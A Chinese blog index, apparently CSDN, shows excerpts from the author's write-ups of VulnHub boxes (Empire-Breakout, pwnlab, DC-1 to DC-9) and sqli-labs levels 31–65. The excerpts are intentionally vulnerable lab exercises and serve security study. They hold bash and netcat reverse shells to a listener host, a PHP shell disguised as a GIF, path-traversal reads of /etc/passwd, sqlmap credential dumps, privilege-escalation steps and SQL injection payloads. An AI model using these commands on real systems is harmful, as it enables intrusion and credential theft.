- 博客(13)
- 收藏
- 关注
RSS订阅原创 vulnhub-Empire-Breakout writeup
/tar -cvf test.tar /var/backups/.old_pass.bak //寻找发现old_pass隐藏目录直接查看没有权限,先用tar压缩,再解压查看。cat /var/backups/.old_pass.bak //得到密码 Ts&4&YurgtRX(=~h。bash -i >& /dev/tcp/192.168.39.128/8888 0>&1 //反弹shell。cat user.txt //得到一个flag。cat r* //得到flag。
2024-08-19 16:55:01
222
原创 vulnhub-pwnlab:init writeup
cp /usr/share/webshells/php/php-reverse-shell.php test.gif //把反弹shell写在gif文件里,再在文件开头加上GIF89a,上传上去,文件路径为:http://192.168.39.131/upload/f3035846cc279a1aff73b7c2c25367b9.gif。page=../../../../etc/passwd //在页面上没有发现什么可以用的,看这个url,可能可以遍历文件,可是尝试后不行。
2024-08-19 16:53:33
365
原创 DC-9 writeup
file=../../../../../etc/knockd.conf //前面扫端口发现ssh协议端口不是开放状态,可能是开启了knock服务查看一下有无配置文件,还真有用nc“敲门”§ §=../../../../../etc/passwd //burp抓包,用fuzz里的参数字典爆破出为file,还发现这里的用户和开始sq爆破出来的一样,可能是主机用户的账号密码。sudo -l //发现/opt/devstuff/dist/test/test可用以root命令执行。
2024-08-19 16:50:48
334
原创 DC-8 writeup
nid=3" --dbs --batch //漏洞库查找没有可以利用的,msf试了也都不行,看这个url就感觉可能会有sql注入,加个冒号报错,则证明很可能有sql注入,丢到sqlmap里面跑还真跑出来了。nid=3" --dump -C name,pass -T users -D d7db --batch //得到两个加密密码丢到john里面爆破。find / -perm -u=s -type f 2>/dev/null //查看suid文件发现有exim4。**一.信息收集**
2024-08-19 16:48:05
392
原创 DC-7 writeup
drush upwd admin --password="123456" //修改admin的密码,登录进去看看,发现content板块可以写入html文件,但不能写入php文件,收集信息发现可以新增php模块,把这个url写到那个添加链接中https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz。ls -l //发现www-data有写入和执行权限但dcuser没有,则我们要尝试找到www-data的权限。**一.信息收集**
2024-08-19 16:47:00
130
原创 DC-6 writeup
zcat /usr/share/wordlists/rockyou.txt.gz | grep k01 > test //根据官方提示密码包含k01能节省很多时间。find / -perm -u=s -type f 2>/dev/null //查看哪些有suid权限,也发现没有可用的,则从用户入手。sudo -l //发现能以jens执行/home/jens/backups.sh,可以利用这个文件切换成jens用户。uname -a //查看发行版本,内核信息没有发现可以利用的|
2024-08-19 16:45:13
256
原创 DC-5 writeup
用burpsuite爆破文件包含名/thankyou.php?file=/etc/nginx/nginx.conf //先看一下nginx的配置文件看日志文件开放没有,可能会有日志文件包含,发现有两个日志文件,这里可以看错误日志文件/var/log/nginx/error.log /thankyou.php?file=/var/log/nginx/error.log&1=nc -e /bin/bash 192.168.229.132 8888 //在kali上开启监听,连接虚拟shell。
2024-08-19 16:43:26
430
原创 DC-4 writeup
wget http://192.168.229.132:/8000/test.sh //发现没有写入权限,则cd到 /tmp 文件中,在/tmp目录下任何人都有写权限。cd /home //去家目录下寻找线索发现只有jim能查看里面的信息,mbox还看不了,里面有一个旧密码的备份文件,复制到test文件尝试爆破。find / -perm -u=s -type f 2>/dev/null //查看哪些有suid权限发现没有可用的。./test.sh //得到root权限。
2024-08-19 16:42:16
312
原创 DC-3 writeup
登录进入后台,发现有文件上传点,上传反弹shell文件(文件见主机渗透文件夹),再用netcat 开启监听,再访问上传的shell的网站路径(配合前面的web目录扫描及网站上面的信息推断出上传的位置),得到一个虚拟shell。cat /usr/share/exploitdb/exploits/linux/local/39772.txt //查看文件,最后给出了exp下载地址。locate /linux/local/39772.txt //查看完整路径。**四.Linux提权**
2024-08-19 16:39:32
369
原创 DC-2 writeup
cat /usr/share/exploitdb/exploits/multiple/webapps/47690.md //发现给了一个有漏洞的url,export PATH=$PATH:/usr/bin/ //这里用vi逃逸rbash su jerry //根据提示去jerry的家目录找找。echo /home/tom/usr/bin/* //查看上面得到的path路径的所有文件,发现可用,用less,ls,scp,vi。/bin/bash //获得root权限。
2024-08-19 16:26:54
432
原创 DC-1 writeup
/得到两个用户,admin,Fred,密码加密可以尝试修改密码(新添一个用户,密码记住,然后把加密后的密码拷到admin的密码里),这里查看资料知道加密脚本是用php写的并且还能用php加参数运行,直接得到加密后的密码 cat /var/www/scripts/password-hash.sh php /var/www/scripts/password-hash.sh 123456 //得到加密后的密码 mysql -udbuser -pR0ck3t use drupaldb;
2024-08-19 16:16:44
635
原创 sqli-labs writeup(less31~65)
less31(还是参数污染) ?id=1&id=-1") union select 1,2,3 -- q //后略less32(宽字节注入,绕过addslashes()函数,注入语句出现的引号里面的数据转为16进制即可,转换时不包括引号) ?id=-1%df'union select 1,2,3 -- q //后略less33(还是宽字节注入,同32关一毛一样) ?id=-1%df' union select 1,2,3 -- q //后略less34(宽字节注入,因为%df是url编码,所以这里不能用,这
2024-08-19 16:03:29
616
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人